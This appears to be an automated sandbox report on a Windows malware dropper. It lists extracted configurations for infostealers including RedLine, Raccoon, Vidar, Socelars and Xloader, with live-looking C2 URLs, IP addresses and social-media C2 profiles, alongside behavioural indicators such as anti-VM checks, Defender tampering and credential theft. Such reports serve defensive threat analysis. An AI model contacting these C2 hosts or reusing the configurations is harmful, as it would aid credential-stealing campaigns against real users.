arkei | 64506751e65ec41605c04620d393cdf9338ce76d31d8b0868dbdfce88f086a03

Resubmissions

10-11-2021 14:50

211110-r7nbvaeddr 10

08-11-2021 16:12

211108-tnmmbahgaj 10

08-11-2021 15:26

211108-svdsbaccf6 10

08-11-2021 14:48

211108-r6lfvshdfn 10

Analysis

max time kernel
226s
max time network
1205s
platform
windows10_x64
resource
win10-de-20211014
submitted
08-11-2021 16:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

Malware Config

Extracted

Family

socelars

http://www.hhgenice.top/

Extracted

Family

xloader

Version

2.5

Campaign

s0iw

http://www.kyiejenner.com/s0iw/

Decoy

ortopediamodelo.com

orimshirts.store

universecatholicweekly.info

yvettechan.com

sersaudavelsempre.online

face-booking.net

europeanretailgroup.com

umofan.com

roemahbajumuslim.online

joyrosecuisine.net

3dmaker.house

megdb.xyz

stereoshopie.info

gv5rm.com

tdc-trust.com

mcglobal.club

choral.works

onlineconsultantgroup.com

friscopaintandbody.com

midwestii.com

Extracted

Family

raccoon

Version

1.8.3-hotfix

Botnet

19425a9ea527ab0b3a94d8156a7d2f62d79d3b73

Attributes

url4cnc
http://91.219.236.162/bimboDinotrex
http://185.163.47.176/bimboDinotrex
http://193.38.54.238/bimboDinotrex
http://74.119.192.122/bimboDinotrex
http://91.219.236.240/bimboDinotrex
https://t.me/bimboDinotrex

rc4.plain

Extracted

Family

redline

45.9.20.149:10844

Extracted

Family

vidar

Version

48.1

Botnet

937

https://koyu.space/@rspich

Attributes

profile_id
937

Extracted

Family

redline

Botnet

udptest

193.56.146.64:65441

Extracted

Family

vidar

Version

47.9

Botnet

933

https://mas.to/@kirpich

Attributes

profile_id
933

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei
Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	9208	4108	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	9820	4108	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	10144	4108	rundll32.exe

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 6 IoCs

Processes:

resource	yara_rule
behavioral3/memory/2064-214-0x0000000003660000-0x000000000368E000-memory.dmp	family_redline
behavioral3/memory/2064-266-0x0000000003A60000-0x0000000003A79000-memory.dmp	family_redline
behavioral3/memory/4928-357-0x0000000000418D3A-mapping.dmp	family_redline
behavioral3/memory/2756-311-0x00000000024B0000-0x00000000024DC000-memory.dmp	family_redline
behavioral3/memory/4484-377-0x0000000004788D4A-mapping.dmp	family_redline
behavioral3/memory/2756-283-0x0000000002310000-0x000000000233E000-memory.dmp	family_redline

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\cdw3osWat18CVPUn7rFB_Pj9.exe	family_socelars
C:\Users\Admin\Pictures\Adobe Films\cdw3osWat18CVPUn7rFB_Pj9.exe	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

Processes:

WerFault.exeWerFault.exe

description	pid	process	target process
PID 3912 created 1296	3912	WerFault.exe	zpFE8L30S3ZheXNi_5l2ALWi.exe
PID 2348 created 3080	2348	WerFault.exe	MegogoSell_crypted.exe

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Xloader
Xloader is a rebranded version of Formbook malware.
loader xloader
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata

Arkei Stealer Payload 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral3/memory/2088-328-0x0000000000400000-0x0000000000453000-memory.dmp	family_arkei
behavioral3/memory/4484-405-0x0000000008B70000-0x0000000009176000-memory.dmp	family_arkei

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 3 IoCs

stealer

Processes:

resource	yara_rule
behavioral3/memory/2968-260-0x0000000000400000-0x00000000004D8000-memory.dmp	family_vidar
behavioral3/memory/4236-392-0x0000000002210000-0x00000000022E6000-memory.dmp	family_vidar
behavioral3/memory/4236-395-0x0000000000400000-0x00000000004D9000-memory.dmp	family_vidar

Xloader Payload 2 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\mbSorhGxB1pNBjghFG36e2Ru.exe	xloader
C:\Users\Admin\Pictures\Adobe Films\mbSorhGxB1pNBjghFG36e2Ru.exe	xloader

Downloads MZ/PE file

Executes dropped EXE 50 IoCs

Processes:

MGF06eWV2QxiQ3cG6az4tr31.exeXfUGHJGj5rWE0ozUme5gWt4O.exe4N57m2SeL5IiTI5AG0oY8LBW.exeCmP8WQcQIe09qWeNkvEOhtAh.exeYyH9SXCqivTrzrPqI3uYJQMd.execdw3osWat18CVPUn7rFB_Pj9.exei_L0A7LldAXrsKpzFi5txJoI.exePWokcJndamMPSc5Glm9GSVbb.exeL6I6NKG1SWCIDwWSCHB1rBJU.exembSorhGxB1pNBjghFG36e2Ru.exeXLxRmbPcDQ4F7J32lIdFDeny.exeB6Bw0roWFP55xUoOvHs45zOz.exeIuYBm3lYwBFvWH4EQPU9_Ywq.exeofHj9XDxpCLOcd4Ya1bSIs3C.exe0u2xG04QKCAjjQdTQBYBGzVU.exescfT65Yi8gy0dT5r5wdXmZND.exe_Jl5NRQH_VCxgKevGBMlhDUr.exeydWz5wGfm19stkAY4iMIn9Xd.exezpFE8L30S3ZheXNi_5l2ALWi.exe7nRws0NZGWjLcr1qIJ1Igckp.exe64sJSaHtBgpmY3s9JraLL3AH.exerJhMZvnFmewWMgIePRFsY_sA.exeU8hSQeS66LgtVXmVBPhymyYt.exefIluvx59br0pDNhWxyCvlECC.exemI2vdU7xMU71GNyMSHNLycKr.exeQRv0Xx09eP0r7lpAjuMx11pq.exeA3Rw_r8xR62BWeGihBmsdcHY.exe3W_ChRgsBOU9yBhDHPqm8yDD.exeMegogoSell_crypted.exeDownFlSetup110.exe8pWB.eXEWW1Soft.exeL6I6NKG1SWCIDwWSCHB1rBJU.exeliuchang-game.exesearch_hyperfs_206.exeRbCJ73zVujImtMJHqjLMBZ0z.exesetup.executm3.exe64sJSaHtBgpmY3s9JraLL3AH.exeUnseduceability.exeinst1.exemshta.exeaskinstall25.exesetup_2.exeCalculator Installation.exepowershell.exe7jBCszsahJM8XJ50JwHaOcRd.tmpchrome update.exechrome2.exeAdvancedRun.exe

pid	process
728	MGF06eWV2QxiQ3cG6az4tr31.exe
2328	XfUGHJGj5rWE0ozUme5gWt4O.exe
2548	4N57m2SeL5IiTI5AG0oY8LBW.exe
2756	CmP8WQcQIe09qWeNkvEOhtAh.exe
4092	YyH9SXCqivTrzrPqI3uYJQMd.exe
3036	cdw3osWat18CVPUn7rFB_Pj9.exe
3328	i_L0A7LldAXrsKpzFi5txJoI.exe
2968	PWokcJndamMPSc5Glm9GSVbb.exe
4024	L6I6NKG1SWCIDwWSCHB1rBJU.exe
3224	mbSorhGxB1pNBjghFG36e2Ru.exe
3188	XLxRmbPcDQ4F7J32lIdFDeny.exe
3116	B6Bw0roWFP55xUoOvHs45zOz.exe
2496	IuYBm3lYwBFvWH4EQPU9_Ywq.exe
2684	ofHj9XDxpCLOcd4Ya1bSIs3C.exe
2212	0u2xG04QKCAjjQdTQBYBGzVU.exe
3684	scfT65Yi8gy0dT5r5wdXmZND.exe
2064	_Jl5NRQH_VCxgKevGBMlhDUr.exe
2068	ydWz5wGfm19stkAY4iMIn9Xd.exe
1296	zpFE8L30S3ZheXNi_5l2ALWi.exe
2232	7nRws0NZGWjLcr1qIJ1Igckp.exe
1988	64sJSaHtBgpmY3s9JraLL3AH.exe
1012	rJhMZvnFmewWMgIePRFsY_sA.exe
2088	U8hSQeS66LgtVXmVBPhymyYt.exe
3688	fIluvx59br0pDNhWxyCvlECC.exe
3556	mI2vdU7xMU71GNyMSHNLycKr.exe
3596	QRv0Xx09eP0r7lpAjuMx11pq.exe
3744	A3Rw_r8xR62BWeGihBmsdcHY.exe
912	3W_ChRgsBOU9yBhDHPqm8yDD.exe
3080	MegogoSell_crypted.exe
4048	DownFlSetup110.exe
4100	8pWB.eXE
4236	WW1Soft.exe
4300	L6I6NKG1SWCIDwWSCHB1rBJU.exe
4476	liuchang-game.exe
4836	search_hyperfs_206.exe
5068	RbCJ73zVujImtMJHqjLMBZ0z.exe
4204	setup.exe
4896	cutm3.exe
4928	64sJSaHtBgpmY3s9JraLL3AH.exe
4744	Unseduceability.exe
4740	inst1.exe
4624	mshta.exe
5100	askinstall25.exe
5044	setup_2.exe
2332	Calculator Installation.exe
4908	powershell.exe
5136	7jBCszsahJM8XJ50JwHaOcRd.tmp
5244	chrome update.exe
5372	chrome2.exe
5504	AdvancedRun.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\ofHj9XDxpCLOcd4Ya1bSIs3C.exe	vmprotect
C:\Users\Admin\Pictures\Adobe Films\ofHj9XDxpCLOcd4Ya1bSIs3C.exe	vmprotect
behavioral3/memory/2684-298-0x0000000140000000-0x0000000140FFB000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mI2vdU7xMU71GNyMSHNLycKr.exei_L0A7LldAXrsKpzFi5txJoI.exeMegogoSell_crypted.exefIluvx59br0pDNhWxyCvlECC.exeA3Rw_r8xR62BWeGihBmsdcHY.exe3W_ChRgsBOU9yBhDHPqm8yDD.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	mI2vdU7xMU71GNyMSHNLycKr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	i_L0A7LldAXrsKpzFi5txJoI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MegogoSell_crypted.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	fIluvx59br0pDNhWxyCvlECC.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	A3Rw_r8xR62BWeGihBmsdcHY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3W_ChRgsBOU9yBhDHPqm8yDD.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	A3Rw_r8xR62BWeGihBmsdcHY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	mI2vdU7xMU71GNyMSHNLycKr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	i_L0A7LldAXrsKpzFi5txJoI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MegogoSell_crypted.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	fIluvx59br0pDNhWxyCvlECC.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3W_ChRgsBOU9yBhDHPqm8yDD.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

Loads dropped DLL 7 IoCs

Processes:

RbCJ73zVujImtMJHqjLMBZ0z.exemshta.exeCalculator Installation.exe

pid	process
5068	RbCJ73zVujImtMJHqjLMBZ0z.exe
5068	RbCJ73zVujImtMJHqjLMBZ0z.exe
4624	mshta.exe
2332	Calculator Installation.exe
2332	Calculator Installation.exe
2332	Calculator Installation.exe
2332	Calculator Installation.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\i_L0A7LldAXrsKpzFi5txJoI.exe	themida
C:\Users\Admin\Pictures\Adobe Films\fIluvx59br0pDNhWxyCvlECC.exe	themida
C:\Users\Admin\Pictures\Adobe Films\mI2vdU7xMU71GNyMSHNLycKr.exe	themida
C:\Users\Admin\Pictures\Adobe Films\3W_ChRgsBOU9yBhDHPqm8yDD.exe	themida
C:\Users\Admin\Pictures\Adobe Films\A3Rw_r8xR62BWeGihBmsdcHY.exe	themida
behavioral3/memory/3328-239-0x0000000000E60000-0x0000000000E61000-memory.dmp	themida
behavioral3/memory/3688-265-0x0000000000380000-0x0000000000381000-memory.dmp	themida
behavioral3/memory/3744-302-0x0000000001270000-0x0000000001271000-memory.dmp	themida
behavioral3/memory/3556-301-0x00000000000D0000-0x00000000000D1000-memory.dmp	themida
behavioral3/memory/912-281-0x00000000008E0000-0x00000000008E1000-memory.dmp	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

i_L0A7LldAXrsKpzFi5txJoI.exefIluvx59br0pDNhWxyCvlECC.exeMegogoSell_crypted.exemI2vdU7xMU71GNyMSHNLycKr.exe3W_ChRgsBOU9yBhDHPqm8yDD.exeA3Rw_r8xR62BWeGihBmsdcHY.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	i_L0A7LldAXrsKpzFi5txJoI.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	fIluvx59br0pDNhWxyCvlECC.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MegogoSell_crypted.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mI2vdU7xMU71GNyMSHNLycKr.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3W_ChRgsBOU9yBhDHPqm8yDD.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	A3Rw_r8xR62BWeGihBmsdcHY.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

252 ip-api.com
25 ipinfo.io
164 ipinfo.io
571 ipinfo.io
572 ipinfo.io
1182 ipinfo.io
1186 ipinfo.io
24 ipinfo.io
165 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
252	ip-api.com
25	ipinfo.io
164	ipinfo.io
571	ipinfo.io
572	ipinfo.io
1182	ipinfo.io
1186	ipinfo.io
24	ipinfo.io
165	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

i_L0A7LldAXrsKpzFi5txJoI.exefIluvx59br0pDNhWxyCvlECC.exemI2vdU7xMU71GNyMSHNLycKr.exe3W_ChRgsBOU9yBhDHPqm8yDD.exeA3Rw_r8xR62BWeGihBmsdcHY.exe

pid	process
3328	i_L0A7LldAXrsKpzFi5txJoI.exe
3688	fIluvx59br0pDNhWxyCvlECC.exe
3556	mI2vdU7xMU71GNyMSHNLycKr.exe
912	3W_ChRgsBOU9yBhDHPqm8yDD.exe
3744	A3Rw_r8xR62BWeGihBmsdcHY.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

mbSorhGxB1pNBjghFG36e2Ru.exeL6I6NKG1SWCIDwWSCHB1rBJU.exe64sJSaHtBgpmY3s9JraLL3AH.exeMegogoSell_crypted.exe

description	pid	process	target process
PID 3224 set thread context of 2540	3224	mbSorhGxB1pNBjghFG36e2Ru.exe	Explorer.EXE
PID 4024 set thread context of 4300	4024	L6I6NKG1SWCIDwWSCHB1rBJU.exe	L6I6NKG1SWCIDwWSCHB1rBJU.exe
PID 1988 set thread context of 4928	1988	64sJSaHtBgpmY3s9JraLL3AH.exe	64sJSaHtBgpmY3s9JraLL3AH.exe
PID 3080 set thread context of 4484	3080	MegogoSell_crypted.exe	AppLaunch.exe

Drops file in Program Files directory 6 IoCs

Processes:

YyH9SXCqivTrzrPqI3uYJQMd.exeB6Bw0roWFP55xUoOvHs45zOz.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	YyH9SXCqivTrzrPqI3uYJQMd.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	YyH9SXCqivTrzrPqI3uYJQMd.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	B6Bw0roWFP55xUoOvHs45zOz.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe	B6Bw0roWFP55xUoOvHs45zOz.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	B6Bw0roWFP55xUoOvHs45zOz.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	B6Bw0roWFP55xUoOvHs45zOz.exe

Drops file in Windows directory 1 IoCs

Processes:

ofHj9XDxpCLOcd4Ya1bSIs3C.exe

description ioc process

File created C:\Windows\System\xxx1.bak ofHj9XDxpCLOcd4Ya1bSIs3C.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\System\xxx1.bak	ofHj9XDxpCLOcd4Ya1bSIs3C.exe

Program crash 8 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3912	1296	WerFault.exe	zpFE8L30S3ZheXNi_5l2ALWi.exe
2348	3080	WerFault.exe	MegogoSell_crypted.exe
5640	5044	WerFault.exe	setup_2.exe
5976	5044	WerFault.exe	setup_2.exe
3640	5044	WerFault.exe	setup_2.exe
6104	5044	WerFault.exe	setup_2.exe
5816	2088	WerFault.exe	U8hSQeS66LgtVXmVBPhymyYt.exe
8068	4236	WerFault.exe	WW1Soft.exe

NSIS installer 6 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\QRv0Xx09eP0r7lpAjuMx11pq.exe	nsis_installer_1
C:\Users\Admin\Pictures\Adobe Films\QRv0Xx09eP0r7lpAjuMx11pq.exe	nsis_installer_2
C:\Users\Admin\Pictures\Adobe Films\QRv0Xx09eP0r7lpAjuMx11pq.exe	nsis_installer_1
C:\Users\Admin\Pictures\Adobe Films\QRv0Xx09eP0r7lpAjuMx11pq.exe	nsis_installer_2
C:\Users\Admin\Pictures\Adobe Films\RbCJ73zVujImtMJHqjLMBZ0z.exe	nsis_installer_1
C:\Users\Admin\Pictures\Adobe Films\RbCJ73zVujImtMJHqjLMBZ0z.exe	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

4N57m2SeL5IiTI5AG0oY8LBW.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	4N57m2SeL5IiTI5AG0oY8LBW.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	4N57m2SeL5IiTI5AG0oY8LBW.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	4N57m2SeL5IiTI5AG0oY8LBW.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1892 schtasks.exe
7932 schtasks.exe
4160 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

7452 timeout.exe
3804 timeout.exe
Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

8836 taskkill.exe
7972 taskkill.exe
5140 taskkill.exe
4384 taskkill.exe
6720 taskkill.exe
7312 taskkill.exe
8792 taskkill.exe

pid	process
1892	schtasks.exe
7932	schtasks.exe
4160	schtasks.exe

pid	process
7452	timeout.exe
3804	timeout.exe

pid	process
8836	taskkill.exe
7972	taskkill.exe
5140	taskkill.exe
4384	taskkill.exe
6720	taskkill.exe
7312	taskkill.exe
8792	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exeMGF06eWV2QxiQ3cG6az4tr31.exe

pid	process
816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe
728	MGF06eWV2QxiQ3cG6az4tr31.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

mbSorhGxB1pNBjghFG36e2Ru.exe4N57m2SeL5IiTI5AG0oY8LBW.exe

pid process

3224 mbSorhGxB1pNBjghFG36e2Ru.exe
3224 mbSorhGxB1pNBjghFG36e2Ru.exe
3224 mbSorhGxB1pNBjghFG36e2Ru.exe
2548 4N57m2SeL5IiTI5AG0oY8LBW.exe

pid	process
3224	mbSorhGxB1pNBjghFG36e2Ru.exe
3224	mbSorhGxB1pNBjghFG36e2Ru.exe
3224	mbSorhGxB1pNBjghFG36e2Ru.exe
2548	4N57m2SeL5IiTI5AG0oY8LBW.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

cdw3osWat18CVPUn7rFB_Pj9.exembSorhGxB1pNBjghFG36e2Ru.exeydWz5wGfm19stkAY4iMIn9Xd.exeExplorer.EXEDownFlSetup110.exeCmP8WQcQIe09qWeNkvEOhtAh.exeWerFault.execscript.exeaskinstall25.exe

description	pid	process
Token: SeCreateTokenPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeAssignPrimaryTokenPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeLockMemoryPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeIncreaseQuotaPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeMachineAccountPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeTcbPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeSecurityPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeTakeOwnershipPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeLoadDriverPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeSystemProfilePrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeSystemtimePrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeProfSingleProcessPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeIncBasePriorityPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeCreatePagefilePrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeCreatePermanentPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeBackupPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeRestorePrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeShutdownPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeDebugPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeAuditPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeSystemEnvironmentPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeChangeNotifyPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
